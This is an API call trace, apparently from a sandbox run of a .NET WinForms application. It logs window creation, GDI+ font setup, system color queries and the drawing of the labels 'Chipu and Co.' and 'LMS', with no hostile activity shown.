[0274.434] GetProcAddress (hModule=0x76b80000, lpProcName="AddDllDirectory") returned 0x75171e91
[0274.435] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x74170000
[0274.459] AdjustWindowRectEx (in: lpRect=0x16f3b8, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x16f3b8) returned 1
[0274.465] GetCurrentProcess () returned 0xffffffff
[0274.465] GetCurrentThread () returned 0xfffffffe
[0274.466] GetCurrentProcess () returned 0xffffffff
[0274.466] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x16f2d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x16f2d0*=0x40) returned 1
[0274.471] GetCurrentThreadId () returned 0x534
[0274.487] GetCurrentActCtx (in: lphActCtx=0x16f230 | out: lphActCtx=0x16f230*=0x0) returned 1
[0274.487] ActivateActCtx (in: hActCtx=0x70614c, lpCookie=0x16f240 | out: hActCtx=0x70614c, lpCookie=0x16f240) returned 1
[0274.490] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76c90000
[0274.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x16f0e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWçp©\x8b²\x93Dþ\x80tÄõ\x16", lpUsedDefaultChar=0x0) returned 14
[0274.490] GetProcAddress (hModule=0x76c90000, lpProcName="DefWindowProcW") returned 0x774c25dd
[0274.491] GetStockObject (i=5) returned 0x1900015
[0274.498] GetModuleHandleW (lpModuleName=0x0) returned 0xec0000
[0274.501] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0274.501] RegisterClassW (lpWndClass=0x16f0d8) returned 0xc107
[0274.501] CoTaskMemFree (pv=0x722330)
[0274.501] GetModuleHandleW (lpModuleName=0x0) returned 0xec0000
[0274.502] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xec0000, lpParam=0x0) returned 0x1015e
[0274.503] SetWindowLongW (hWnd=0x1015e, nIndex=-4, dwNewLong=2001479133) returned 71436502
[0274.504] GetWindowLongW (hWnd=0x1015e, nIndex=-4) returned 2001479133
[0274.514] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x16e9ec | out: phkResult=0x16e9ec*=0x230) returned 0x0
[0274.516] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x16ea0c, lpData=0x0, lpcbData=0x16ea08*=0x0 | out: lpType=0x16ea0c*=0x0, lpData=0x0, lpcbData=0x16ea08*=0x0) returned 0x2
[0274.516] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x16ea0c, lpData=0x0, lpcbData=0x16ea08*=0x0 | out: lpType=0x16ea0c*=0x0, lpData=0x0, lpcbData=0x16ea08*=0x0) returned 0x2
[0274.516] RegCloseKey (hKey=0x230) returned 0x0
[0274.518] SetWindowLongW (hWnd=0x1015e, nIndex=-4, dwNewLong=71436542) returned 2001479133
[0274.518] GetWindowLongW (hWnd=0x1015e, nIndex=-4) returned 71436542
[0274.518] GetWindowLongW (hWnd=0x1015e, nIndex=-16) returned 113311744
[0274.520] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc108
[0274.521] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x1015e, Msg=0x24, wParam=0x0, lParam=0x16ecc4) returned 0x0
[0274.521] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc109
[0274.521] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x1015e, Msg=0x81, wParam=0x0, lParam=0x16ecb8) returned 0x1
[0274.521] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x1015e, Msg=0x83, wParam=0x0, lParam=0x16eca4) returned 0x0
[0274.522] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x1015e, Msg=0x1, wParam=0x0, lParam=0x16ecb8) returned 0x0
[0274.522] GetClientRect (in: hWnd=0x1015e, lpRect=0x16ea20 | out: lpRect=0x16ea20) returned 1
[0274.523] GetWindowRect (in: hWnd=0x1015e, lpRect=0x16ea20 | out: lpRect=0x16ea20) returned 1
[0274.524] GetParent (hWnd=0x1015e) returned 0x0
[0274.525] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c110001) returned 1
[0274.722] AdjustWindowRectEx (in: lpRect=0x16f168, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f168) returned 1
[0274.723] AdjustWindowRectEx (in: lpRect=0x16f178, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f178) returned 1
[0274.723] AdjustWindowRectEx (in: lpRect=0x16f178, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f178) returned 1
[0274.724] AdjustWindowRectEx (in: lpRect=0x16f178, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f178) returned 1
[0274.725] AdjustWindowRectEx (in: lpRect=0x16f178, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f178) returned 1
[0274.725] AdjustWindowRectEx (in: lpRect=0x16f178, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f178) returned 1
[0274.726] AdjustWindowRectEx (in: lpRect=0x16f168, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f168) returned 1
[0274.731] AdjustWindowRectEx (in: lpRect=0x16f17c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f17c) returned 1
[0274.732] AdjustWindowRectEx (in: lpRect=0x16f17c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f17c) returned 1
[0274.733] AdjustWindowRectEx (in: lpRect=0x16f168, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f168) returned 1
[0274.737] GetCurrentThreadId () returned 0x534
[0274.737] GetCurrentThreadId () returned 0x534
[0274.741] GetSystemDefaultLCID () returned 0x409
[0274.742] GetStockObject (i=17) returned 0x18a0025
[0274.744] GetObjectW (in: h=0x18a0025, c=92, pv=0x16efcc | out: pv=0x16efcc) returned 92
[0274.745] GetDC (hWnd=0x0) returned 0x150107bd
[0274.755] GdiplusStartup (in: token=0x266018, input=0x16e590, output=0x16e5e0 | out: token=0x266018, output=0x16e5e0) returned 0x0
[0274.768] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0274.768] GdipCreateFontFromLogfontW (hdc=0x150107bd, logfont=0x722330, font=0x16f094) returned 0x0
[0274.891] CoTaskMemFree (pv=0x722330)
[0274.892] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0274.892] CoTaskMemFree (pv=0x722330)
[0274.892] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0274.893] CoTaskMemFree (pv=0x722330)
[0274.893] GdipGetFontUnit (font=0x572230, unit=0x16f05c) returned 0x0
[0274.893] GdipGetFontSize (font=0x572230, size=0x16f060) returned 0x0
[0274.894] GdipGetFontStyle (font=0x572230, style=0x16f058) returned 0x0
[0274.894] GdipGetFamily (font=0x572230, family=0x16f054) returned 0x0
[0274.895] GdipGetFontSize (font=0x572230, size=0x23ddd28) returned 0x0
[0274.895] ReleaseDC (hWnd=0x0, hDC=0x150107bd) returned 1
[0274.896] GetDC (hWnd=0x0) returned 0x70101c6
[0274.896] GdipCreateFromHDC (hdc=0x70101c6, graphics=0x16f070) returned 0x0
[0274.898] GdipGetDpiY (graphics=0x5079170, dpi=0x23dde04) returned 0x0
[0274.898] GdipGetFontHeight (font=0x572230, graphics=0x5079170, height=0x16f068) returned 0x0
[0274.898] GdipGetEmHeight (family=0x57f358, style=0, EmHeight=0x16f070) returned 0x0
[0274.899] GdipGetLineSpacing (family=0x57f358, style=0, LineSpacing=0x16f070) returned 0x0
[0274.911] GdipDeleteGraphics (graphics=0x5079170) returned 0x0
[0274.912] ReleaseDC (hWnd=0x0, hDC=0x70101c6) returned 1
[0274.914] GdipCreateFont (fontFamily=0x57f358, emSize=0x41040000, style=0, unit=0x3, font=0x23dde20) returned 0x0
[0274.914] GdipGetFontSize (font=0x4ff0960, size=0x23dde24) returned 0x0
[0274.914] GdipDeleteFont (font=0x572230) returned 0x0
[0274.917] GetCurrentThreadId () returned 0x534
[0274.917] GetCurrentThreadId () returned 0x534
[0274.917] GetCurrentThreadId () returned 0x534
[0274.917] GetCurrentThreadId () returned 0x534
[0274.918] GetCurrentThreadId () returned 0x534
[0274.918] GetCurrentThreadId () returned 0x534
[0274.918] GetCurrentThreadId () returned 0x534
[0274.918] GetCurrentThreadId () returned 0x534
[0274.918] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0274.925] GetProcessWindowStation () returned 0x60
[0274.927] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x23de6d8, nLength=0xc, lpnLengthNeeded=0x16efe4 | out: pvInfo=0x23de6d8, lpnLengthNeeded=0x16efe4) returned 1
[0274.930] SetConsoleCtrlHandler (HandlerRoutine=0x4420926, Add=1) returned 1
[0274.931] GetModuleHandleW (lpModuleName=0x0) returned 0xec0000
[0274.931] GetModuleHandleW (lpModuleName=0x0) returned 0xec0000
[0274.934] GetClassInfoW (in: hInstance=0xec0000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x23de73c | out: lpWndClass=0x23de73c) returned 0
[0274.936] CoTaskMemAlloc (cb=0x58) returned 0x7095f0
[0274.936] RegisterClassW (lpWndClass=0x16ef34) returned 0xc10b
[0274.936] CoTaskMemFree (pv=0x7095f0)
[0274.937] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xec0000, lpParam=0x0) returned 0x10162
[0274.938] NtdllDefWindowProc_W () returned 0x1
[0274.939] NtdllDefWindowProc_W () returned 0x0
[0274.939] NtdllDefWindowProc_W () returned 0x0
[0274.939] NtdllDefWindowProc_W () returned 0x0
[0274.939] NtdllDefWindowProc_W () returned 0x0
[0274.942] GetSysColor (nIndex=10) returned 0xb4b4b4
[0274.942] GetSysColor (nIndex=2) returned 0xd1b499
[0274.942] GetSysColor (nIndex=9) returned 0x0
[0274.942] GetSysColor (nIndex=12) returned 0xababab
[0274.942] GetSysColor (nIndex=15) returned 0xf0f0f0
[0274.942] GetSysColor (nIndex=20) returned 0xffffff
[0274.942] GetSysColor (nIndex=16) returned 0xa0a0a0
[0274.942] GetSysColor (nIndex=15) returned 0xf0f0f0
[0274.942] GetSysColor (nIndex=16) returned 0xa0a0a0
[0274.942] GetSysColor (nIndex=21) returned 0x696969
[0274.942] GetSysColor (nIndex=22) returned 0xe3e3e3
[0274.942] GetSysColor (nIndex=20) returned 0xffffff
[0274.942] GetSysColor (nIndex=18) returned 0x0
[0274.942] GetSysColor (nIndex=1) returned 0x0
[0274.942] GetSysColor (nIndex=27) returned 0xead1b9
[0274.942] GetSysColor (nIndex=28) returned 0xf2e4d7
[0274.942] GetSysColor (nIndex=17) returned 0x6d6d6d
[0274.942] GetSysColor (nIndex=13) returned 0xff9933
[0274.942] GetSysColor (nIndex=14) returned 0xffffff
[0274.942] GetSysColor (nIndex=26) returned 0xcc6600
[0274.942] GetSysColor (nIndex=11) returned 0xfcf7f4
[0274.942] GetSysColor (nIndex=3) returned 0xdbcdbf
[0274.943] GetSysColor (nIndex=19) returned 0x544e43
[0274.943] GetSysColor (nIndex=24) returned 0xe1ffff
[0274.943] GetSysColor (nIndex=23) returned 0x0
[0274.943] GetSysColor (nIndex=4) returned 0xf0f0f0
[0274.943] GetSysColor (nIndex=30) returned 0xf0f0f0
[0274.943] GetSysColor (nIndex=29) returned 0xff9933
[0274.943] GetSysColor (nIndex=7) returned 0x0
[0274.943] GetSysColor (nIndex=0) returned 0xc8c8c8
[0274.943] GetSysColor (nIndex=5) returned 0xffffff
[0274.943] GetSysColor (nIndex=6) returned 0x646464
[0274.943] GetSysColor (nIndex=8) returned 0x0
[0274.943] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0274.944] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.944] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.947] GetCurrentThreadId () returned 0x534
[0274.947] GetCurrentThreadId () returned 0x534
[0274.947] GetCurrentThreadId () returned 0x534
[0274.947] GetCurrentThreadId () returned 0x534
[0274.947] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0274.947] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0274.948] AdjustWindowRectEx (in: lpRect=0x16efb8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efb8) returned 1
[0274.950] GdipGetFamilyName (in: family=0x57f358, name=0x16ef80, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0274.951] CreateCompatibleDC (hdc=0x0) returned 0x1001020d
[0274.953] GetCurrentObject (hdc=0x1001020d, type=0x1) returned 0x1b00017
[0274.953] GetCurrentObject (hdc=0x1001020d, type=0x2) returned 0x1900010
[0274.953] GetCurrentObject (hdc=0x1001020d, type=0x7) returned 0x185000f
[0274.953] GetCurrentObject (hdc=0x1001020d, type=0x6) returned 0x18a002e
[0274.955] SaveDC (hdc=0x1001020d) returned 1
[0274.955] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0274.957] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0274.957] CreateFontIndirectW (lplf=0x722330) returned 0x80a020b
[0274.957] CoTaskMemFree (pv=0x722330)
[0274.958] GetObjectW (in: h=0x80a020b, c=92, pv=0x16ef44 | out: pv=0x16ef44) returned 92
[0274.959] GetCurrentObject (hdc=0x1001020d, type=0x6) returned 0x18a002e
[0274.959] GetObjectW (in: h=0x18a002e, c=92, pv=0x16ef34 | out: pv=0x16ef34) returned 92
[0274.960] SelectObject (hdc=0x1001020d, h=0x80a020b) returned 0x18a002e
[0274.960] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23df8b4 | out: psizl=0x23df8b4) returned 1
[0274.964] AdjustWindowRectEx (in: lpRect=0x16f090, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f090) returned 1
[0274.966] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x16f158) returned 0x0
[0274.966] GdipCreateFont (fontFamily=0x4fab598, emSize=0x417c0000, style=1, unit=0x3, font=0x23df9a8) returned 0x0
[0275.007] GdipGetFontSize (font=0x572230, size=0x23df9ac) returned 0x0
[0275.008] AdjustWindowRectEx (in: lpRect=0x16ef70, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ef70) returned 1
[0275.017] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef38, language=0x409 | out: name="Arial") returned 0x0
[0275.018] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.018] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.018] CreateFontIndirectW (lplf=0x722330) returned 0x50a0208
[0275.019] CoTaskMemFree (pv=0x722330)
[0275.019] GetObjectW (in: h=0x50a0208, c=92, pv=0x16eefc | out: pv=0x16eefc) returned 92
[0275.019] SelectObject (hdc=0x1001020d, h=0x50a0208) returned 0x80a020b
[0275.020] DeleteObject (ho=0x80a020b) returned 1
[0275.020] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23dfc5c | out: psizl=0x23dfc5c) returned 1
[0275.022] AdjustWindowRectEx (in: lpRect=0x16f048, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f048) returned 1
[0275.022] AdjustWindowRectEx (in: lpRect=0x16efa4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efa4) returned 1
[0275.022] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef6c, language=0x409 | out: name="Arial") returned 0x0
[0275.022] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.022] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.022] CreateFontIndirectW (lplf=0x722330) returned 0x90a020b
[0275.022] CoTaskMemFree (pv=0x722330)
[0275.022] GetObjectW (in: h=0x90a020b, c=92, pv=0x16ef30 | out: pv=0x16ef30) returned 92
[0275.023] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23dfe54 | out: psizl=0x23dfe54) returned 1
[0275.023] DeleteObject (ho=0x90a020b) returned 1
[0275.023] AdjustWindowRectEx (in: lpRect=0x16f0dc, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f0dc) returned 1
[0275.024] AdjustWindowRectEx (in: lpRect=0x16efa4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efa4) returned 1
[0275.024] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef6c, language=0x409 | out: name="Arial") returned 0x0
[0275.026] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.027] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.027] CreateFontIndirectW (lplf=0x722330) returned 0xa0a020b
[0275.027] CoTaskMemFree (pv=0x722330)
[0275.027] GetObjectW (in: h=0xa0a020b, c=92, pv=0x16ef30 | out: pv=0x16ef30) returned 92
[0275.027] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23e0054 | out: psizl=0x23e0054) returned 1
[0275.027] DeleteObject (ho=0xa0a020b) returned 1
[0275.027] AdjustWindowRectEx (in: lpRect=0x16ef7c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ef7c) returned 1
[0275.034] GdipGetFamilyName (in: family=0x4fab598, name=0x16ee68, language=0x409 | out: name="Arial") returned 0x0
[0275.034] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.034] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.035] CreateFontIndirectW (lplf=0x722330) returned 0xb0a020b
[0275.035] CoTaskMemFree (pv=0x722330)
[0275.035] GetObjectW (in: h=0xb0a020b, c=92, pv=0x16ee2c | out: pv=0x16ee2c) returned 92
[0275.037] GetMapMode (hdc=0x1001020d) returned 1
[0275.038] GetTextMetricsW (in: hdc=0x1001020d, lptm=0x16ee5c | out: lptm=0x16ee5c) returned 1
[0275.041] DrawTextExW (in: hdc=0x1001020d, lpchText="Chipu and Co.", cchText=13, lprc=0x16ef68, format=0x2400, lpdtp=0x23e02f8 | out: lpchText="Chipu and Co.", lprc=0x16ef68) returned 24
[0275.061] AdjustWindowRectEx (in: lpRect=0x16f054, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f054) returned 1
[0275.077] AdjustWindowRectEx (in: lpRect=0x16efb8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efb8) returned 1
[0275.077] GdipGetFamilyName (in: family=0x57f358, name=0x16ef80, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0275.077] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.078] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.078] CreateFontIndirectW (lplf=0x722330) returned 0xa0a0206
[0275.078] CoTaskMemFree (pv=0x722330)
[0275.078] GetObjectW (in: h=0xa0a0206, c=92, pv=0x16ef44 | out: pv=0x16ef44) returned 92
[0275.078] SelectObject (hdc=0x1001020d, h=0xa0a0206) returned 0x50a0208
[0275.078] DeleteObject (ho=0x50a0208) returned 1
[0275.078] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23e159c | out: psizl=0x23e159c) returned 1
[0275.079] AdjustWindowRectEx (in: lpRect=0x16f090, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f090) returned 1
[0275.079] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x16f158) returned 0x0
[0275.080] GdipCreateFont (fontFamily=0x4fab598, emSize=0x417c0000, style=1, unit=0x3, font=0x23e16bc) returned 0x0
[0275.080] GdipGetFontSize (font=0x4ff02b8, size=0x23e16c0) returned 0x0
[0275.080] AdjustWindowRectEx (in: lpRect=0x16ef70, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ef70) returned 1
[0275.080] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef38, language=0x409 | out: name="Arial") returned 0x0
[0275.080] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.080] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.080] CreateFontIndirectW (lplf=0x722330) returned 0x60a0208
[0275.080] CoTaskMemFree (pv=0x722330)
[0275.080] GetObjectW (in: h=0x60a0208, c=92, pv=0x16eefc | out: pv=0x16eefc) returned 92
[0275.080] SelectObject (hdc=0x1001020d, h=0x60a0208) returned 0xa0a0206
[0275.081] DeleteObject (ho=0xa0a0206) returned 1
[0275.081] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23e1928 | out: psizl=0x23e1928) returned 1
[0275.081] AdjustWindowRectEx (in: lpRect=0x16f048, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f048) returned 1
[0275.081] AdjustWindowRectEx (in: lpRect=0x16efa4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efa4) returned 1
[0275.081] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef6c, language=0x409 | out: name="Arial") returned 0x0
[0275.081] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.081] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.081] CreateFontIndirectW (lplf=0x722330) returned 0xb0a0206
[0275.081] CoTaskMemFree (pv=0x722330)
[0275.081] GetObjectW (in: h=0xb0a0206, c=92, pv=0x16ef30 | out: pv=0x16ef30) returned 92
[0275.082] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23e1b20 | out: psizl=0x23e1b20) returned 1
[0275.082] DeleteObject (ho=0xb0a0206) returned 1
[0275.082] AdjustWindowRectEx (in: lpRect=0x16f0dc, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f0dc) returned 1
[0275.082] AdjustWindowRectEx (in: lpRect=0x16efa4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efa4) returned 1
[0275.082] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef6c, language=0x409 | out: name="Arial") returned 0x0
[0275.082] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.082] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.082] CreateFontIndirectW (lplf=0x722330) returned 0xc0a0206
[0275.082] CoTaskMemFree (pv=0x722330)
[0275.082] GetObjectW (in: h=0xc0a0206, c=92, pv=0x16ef30 | out: pv=0x16ef30) returned 92
[0275.082] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23e1d14 | out: psizl=0x23e1d14) returned 1
[0275.083] DeleteObject (ho=0xc0a0206) returned 1
[0275.083] AdjustWindowRectEx (in: lpRect=0x16ef7c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ef7c) returned 1
[0275.083] DrawTextExW (in: hdc=0x1001020d, lpchText="LMS", cchText=3, lprc=0x16ef68, format=0x2400, lpdtp=0x23e1da0 | out: lpchText="LMS", lprc=0x16ef68) returned 24
[0275.083] AdjustWindowRectEx (in: lpRect=0x16f054, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f054) returned 1
[0275.083] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0275.083] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0275.085] AdjustWindowRectEx (in: lpRect=0x16f13c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16f13c) returned 1
[0275.085] GetSystemMetrics (nIndex=59) returned 1460
[0275.085] GetSystemMetrics (nIndex=60) returned 920
[0275.085] GetSystemMetrics (nIndex=34) returned 132
[0275.085] GetSystemMetrics (nIndex=35) returned 38
[0275.086] AdjustWindowRectEx (in: lpRect=0x16f03c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16f03c) returned 1
[0275.086] GetCurrentThreadId () returned 0x534
[0275.086] GetCurrentThreadId () returned 0x534
[0275.086] GetCurrentThreadId () returned 0x534
[0275.086] GetCurrentThreadId () returned 0x534
[0275.087] GetCurrentThreadId () returned 0x534
[0275.087] GetCurrentThreadId () returned 0x534
[0275.088] CreateCompatibleDC (hdc=0x0) returned 0xd010206
[0275.089] GetDC (hWnd=0x0) returned 0x70101c6
[0275.090] GdipCreateFromHDC (hdc=0x70101c6, graphics=0x16ef78) returned 0x0
[0275.090] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.090] GdipGetLogFontW (font=0x4ff0960, graphics=0x50e3340, logfontW=0x722330) returned 0x0
[0275.091] CoTaskMemFree (pv=0x722330)
[0275.091] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.091] CoTaskMemFree (pv=0x722330)
[0275.091] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.092] CoTaskMemFree (pv=0x722330)
[0275.092] GdipDeleteGraphics (graphics=0x50e3340) returned 0x0
[0275.092] ReleaseDC (hWnd=0x0, hDC=0x70101c6) returned 1
[0275.092] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.092] CreateFontIndirectW (lplf=0x722330) returned 0x30a0207
[0275.092] CoTaskMemFree (pv=0x722330)
[0275.093] SelectObject (hdc=0xd010206, h=0x30a0207) returned 0x18a002e
[0275.093] GetTextMetricsW (in: hdc=0xd010206, lptm=0x16f084 | out: lptm=0x16f084) returned 1
[0275.093] GetTextExtentPoint32W (in: hdc=0xd010206, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x23e226c | out: psizl=0x23e226c) returned 1
[0275.093] SelectObject (hdc=0xd010206, h=0x18a002e) returned 0x30a0207
[0275.094] DeleteDC (hdc=0xd010206) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f064, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f064) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16eec8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16eec8) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
